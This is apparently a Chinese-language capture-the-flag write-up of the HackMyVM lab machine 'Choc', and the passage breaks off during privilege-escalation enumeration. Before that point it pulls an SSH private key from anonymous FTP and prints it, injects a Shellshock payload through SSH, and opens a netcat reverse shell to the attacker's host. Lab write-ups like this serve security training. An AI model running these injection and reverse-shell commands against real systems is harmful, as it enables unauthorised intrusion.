{"id":876,"date":"2025-06-14T23:29:58","date_gmt":"2025-06-14T15:29:58","guid":{"rendered":"http:\/\/162.14.82.114\/?p=876"},"modified":"2025-06-14T23:29:58","modified_gmt":"2025-06-14T15:29:58","slug":"hmv-_-choc","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/876\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Choc"},"content":{"rendered":"<h1>Choc<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329091.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329091.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613213042385\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329092.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329092.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614154056340\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ sudo nmap -sT -T4 -sC -sV $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-14 03:42 EDT\nNmap scan report for 192.168.10.103\nHost is up (0.0035s latency).\nNot shown: 998 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n21\/tcp open  ftp     vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.10.102\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rwxrwxrwx    1 0        0            1811 Apr 20  2021 id_rsa [NSE: writeable]\n22\/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c5:66:48:ee:7b:a9:ef:e1:20:26:c5:a8:bf:c5:4d:5c (RSA)\n|   256 80:46:cd:47:a1:ce:a7:fe:56:36:4f:f7:d1:ed:92:c0 (ECDSA)\n|_  256 a2:83:db:7a:7d:38:70:e6:00:16:71:29:ee:04:73:aa (ED25519)\nMAC Address: 08:00:27:05:3C:B3 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 1.53 seconds<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>ftp\u670d\u52a1\u63a2\u6d4b<\/h3>\n<p>\u53d1\u73b0\u5141\u8bb8\u533f\u540d\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ lftp $IP\nlftp 192.168.10.103:~&gt; ls\n-rwxrwxrwx    1 0        0            1811 Apr 20  2021 id_rsa\nlftp 192.168.10.103:\/&gt; get id_rsa \n1811 bytes transferred\nlftp 192.168.10.103:\/&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ cat id_rsa      \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAsQCczRyfpNWE2Ugqm3ZmOI1wjRrg6xHhy5rBBzA5Ih6U9cviHi1c\nclLq1pA8MFgHrO\/G3xx5F2yDVY++PdRI6B96+DsMYYWWuM\/ZrVmiZVrXZZcxMrAuhlK9Uy\nD13N72ZIj21LgFmK8+Gx26UKCLmJfnAIDijymxUUYXyyDqpPtW7DPi1XFoME+WSAqcYkzo\niEjQFD4CJ6wSpK5RaLbfozT7mcE8v8leyMeAno5JzBoNTKrsj\/ti8s3hKZn\/jnMKEua\/41\nVpUnXTtRYpt+95UzaQzio9pMDbGvczv\/YwIze7obtZoe8G\/JXVNCJgnqeAunayUk232Di5\nVe6y4Hx9FwAAA8Ab+Q4SG\/kOEgAAAAdzc2gtcnNhAAABAQCxAJzNHJ+k1YTZSCqbdmY4jX\nCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4Owxh\nhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRh\nfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknM\nGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1\nmh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0XAAAAAwEAAQAAAQBtfN6BdhI+aSF7MkvA\nzJVgqAUWE6lLX01Xn4uFgcvlkhs8i\/h8CD0mLqo7PQ8uLFXbIJrYygkRdzsqQvc\/0b+jbk\n2nnQcEkBjyiwewVkDBB1cz7TkujJLK3gVklX\/gNz8cYyij3oz\/rG7zYQkt9JFFO7lVs2Px\ngK3Bg2UWbm8Wy6aj36XMyPOywdec4tveb5KfcdIb4mWr0QSGLpUr8XuYIUMUofd8iv3QQU\nzpcQMwoOcKCV\/Q+4t8jIF+dOCuBYca9QlY3po48yC9VHv78f8QgQzsazQXqYAusoNesVC6\nHi6+LtpHh+Hr\/m4Z7EFVtLVcNbWgtlhhfCxHBjKaeMGBAAAAgDhFvTbro0SLydbImERRJR\nFLILG+9KEOHgbKU9zBvww5ffGNuVjrkCKegzTCZszr6nLj\/biZCFMSu7bZiFzWjffwmOdm\nC0sslLd\/ggyYmNotp4TjTEYF+53OFCUm2W8asFXCI9jHrfgR0\/aFwAV9OLJHrzYehKfayT\nnsgAc6SihqAAAAgQDdcvP2mXRHegBcd6rouW4i9ktzECE9ujBy\/KvyzQkVS3e+rhsbjisV\nt2mx1jX8YJ+NA499063\/tn3T9RDGf9U2Cv+2QvO5ZL+5UDLC9ywCEYMPEuOnumbMlK9wuQ\nfRTtHHvKOewBLskyvxCGQGwmxfkeOh5iGpFmiw0R\/O3+nqwQAAAIEAzJ5ixt3FneAcWcGo\nOUZfsk9IVJZoGCSd\/ljYTCPX00l+YmZviVrge3pqCEgNQIiLorPDaPYjY\/rsARZPf1lVS1\n+L0rtKK4BhD+1qR4xebv\/5lKEMktqCn+rt4Z8aejb2Pi5fmNet2zNJTkcsWuVrPG7fHzWa\n6+s3SjFL\/cTmldcAAAAJY2FybEBjaG9jAQI=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u554a\u8fd9\u4e48\u6734\u5b9e\u65e0\u534e\u7684\u5417\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>\u79c1\u94a5\u89e3\u51fa\u516c\u94a5\u5f97\u51fa\u7528\u6237\u540d<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh-keygen -y -f id_rsa      \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa \nThe authenticity of host &#039;192.168.10.103 (192.168.10.103)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:Nk+ApyuQT48pIB1QJmATsKLeg+bt8Ii5CjJvV\/nPTDo.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.10.103&#039; (ED25519) to the list of known hosts.\n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                #\n#                            #\n##############################\n\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557     \u2588\u2588\u2557      \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557     \n        \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557    \u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551     \n        \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u255a\u2550\u255d     \u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d     \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\nConnection to 192.168.10.103 closed.<\/code><\/pre>\n<p>\u554a\u8fd9\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329094.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329094.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614154554548\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\uff1f\uff1f\uff1f<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa &quot;pwd&quot;\n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                #\n#                            #\n##############################\n\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557     \u2588\u2588\u2557      \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557     \n        \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557    \u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551     \n        \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u255a\u2550\u255d     \u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d     \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n<\/code><\/pre>\n<p>\u4e0d\u884c\u54e6\uff0c\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff0c\u53d1\u73b0\u8fd8\u4e0d\u80fd\u770b\u8c03\u8bd5\u4fe1\u606f\u3002\u3002\u3002\u770b\u4e0b\u7248\u672c\u53f7\uff0c\u662f\u4e0d\u662f\u6709\u5565\u6f0f\u6d1e\uff1a<code>OpenSSH 7.9p1<\/code>\uff0c\u7a81\u7136\u60f3\u5230\u6709\u6ca1\u6709\u53ef\u80fd\u662f<code>shellshock<\/code>\u6f0f\u6d1e\uff0c\u5229\u7528\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\u73af\u5883\u53d8\u91cf\u9a97\u8fc7\u670d\u52a1\u5668\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa &#039;() { :;};whoami&#039;   \n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                #\n#                            #\n##############################\n\ncarl<\/code><\/pre>\n<p><strong>\u6ce8\u610f\uff1a\u4e00\u4e2a\u7a7a\u683c\u90fd\u4e0d\u80fd\u9519\uff01\uff01\uff01\uff01<\/strong><\/p>\n<ul>\n<li>\n<p><strong><code>()<\/code>\u540e\u7684\u7a7a\u683c<\/strong>\uff1a\u6807\u8bc6\u51fd\u6570\u5b9a\u4e49\u7684\u5f00\u59cb\uff0c\u89e6\u53d1 Bash \u5c06\u5176\u89e3\u6790\u4e3a\u51fd\u6570\u800c\u975e\u666e\u901a\u5b57\u7b26\u4e32\u3002<\/p>\n<\/li>\n<li>\n<p><strong>{ \u540e\u7684\u7a7a\u683c<\/strong>\uff1a\u5206\u9694\u51fd\u6570\u4f53\u8d77\u59cb\u7b26\u53f7\u4e0e\u5185\u90e8\u547d\u4ee4\uff08\u6b64\u5904\u4e3a\u5360\u4f4d\u7b26:\uff09\u3002<\/p>\n<p>\u82e5\u7f3a\u5c11\u4efb\u610f\u7a7a\u683c\uff08\u5982<code>&#039;(){:;};&#039;<\/code>\uff09\uff0cBash \u53ef\u80fd\u5ffd\u7565\u51fd\u6570\u5b9a\u4e49\uff0c\u4ec5\u89c6\u4e3a\u666e\u901a\u73af\u5883\u53d8\u91cf<\/p>\n<\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa &#039;() { :;};nc -e \/bin\/bash 192.168.10.102 1234&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329095.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329095.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614160812061\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/carl$ ls -la\ntotal 40\ndrwxr-xr-x 5 carl carl 4096 Apr 20  2021 .\ndrwxr-xr-x 5 root root 4096 Apr 18  2021 ..\nlrwxrwxrwx 1 root root    9 Apr 20  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 carl carl  220 Apr 18  2021 .bash_logout\n-rw-r--r-- 1 carl carl 3526 Apr 18  2021 .bashrc\ndrwx------ 3 carl carl 4096 Apr 18  2021 .gnupg\ndrwxr-xr-x 3 carl carl 4096 Apr 18  2021 .local\n-rw-r--r-- 1 carl carl  807 Apr 18  2021 .profile\ndrwx------ 2 carl carl 4096 Apr 20  2021 .ssh\n-rw-r--r-- 1 carl carl 1067 Apr 18  2021 troll.txt\n-rw------- 1 carl carl   52 Apr 18  2021 .Xauthority\n(remote) carl@choc:\/home\/carl$ cat troll.txt \n\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557     \u2588\u2588\u2557      \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557     \n        \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557    \u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551     \n        \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u255a\u2550\u255d     \u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d     \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n(remote) carl@choc:\/home\/carl$ cd .ssh\n(remote) carl@choc:\/home\/carl\/.ssh$ ls -la\ntotal 20\ndrwx------ 2 carl carl 4096 Apr 20  2021 .\ndrwxr-xr-x 5 carl carl 4096 Apr 20  2021 ..\n-rw-r--r-- 1 carl carl  417 Apr 20  2021 authorized_keys\n-rw------- 1 carl carl 1811 Apr 20  2021 id_rsa\n-rw-r--r-- 1 carl carl  391 Apr 20  2021 id_rsa.pub\n(remote) carl@choc:\/home\/carl\/.ssh$ cat id_rsa.pub\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc\n(remote) carl@choc:\/home\/carl\/.ssh$ cat authorized_keys\ncommand=&quot;cat ~\/troll.txt&quot; ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc\n(remote) carl@choc:\/home\/carl\/.ssh$ cd .. \n(remote) carl@choc:\/home\/carl$ bash --version\nGNU bash, version 4.3.0(1)-release (x86_64-unknown-linux-gnu)\nCopyright (C) 2013 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\n\nThis is free software; you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n(remote) carl@choc:\/home\/carl$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\nPassword: \n(remote) carl@choc:\/home\/carl$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/local\/bin\/sudo\n(remote) carl@choc:\/home\/carl$ \/usr\/local\/bin\/sudo -V\nSudo version 1.8.23\nSudoers policy plugin version 1.8.23\nSudoers file grammar version 46\nSudoers I\/O plugin version 1.8.23<\/code><\/pre>\n<p>\u7ffb\u5230\u4e86\u4e00\u4e2a\u5947\u602a\u7684<code>sudo<\/code>\uff0c\u4f4d\u7f6e\u5f88\u5947\u602a\u3002\u3002\u3002\u63a5\u7740\u770b\u4e0b\u6709\u54ea\u4e9b\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/carl$ ls -la \/home\/\ntotal 20\ndrwxr-xr-x  5 root  root  4096 Apr 18  2021 .\ndrwxr-xr-x 19 root  root  4096 Apr 18  2021 ..\ndrwxr-xr-x  5 carl  carl  4096 Apr 20  2021 carl\ndrwxrwx---  5 sarah torki 4096 Apr 20  2021 sarah\ndrwxr-xr-x  6 torki torki 4096 Apr 19  2021 torki\n(remote) carl@choc:\/home\/carl$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\ntorki\nsarah\ncarl\nsshd<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/torki\/secret_garden$ cat diary.txt\n\nApril 18th 2021\nLast night I dreamed that I was at the beach with scarlett johansson, worst wake up call of my life!\n\nSeptember 12th 2309\nI invented a time machine.The world is still crazy, territorial and proud !!\n\nA day in -4.5000000000\nThe human doesn&#039;t exist yet and that&#039;s fucking great!!! but I&#039;m a little 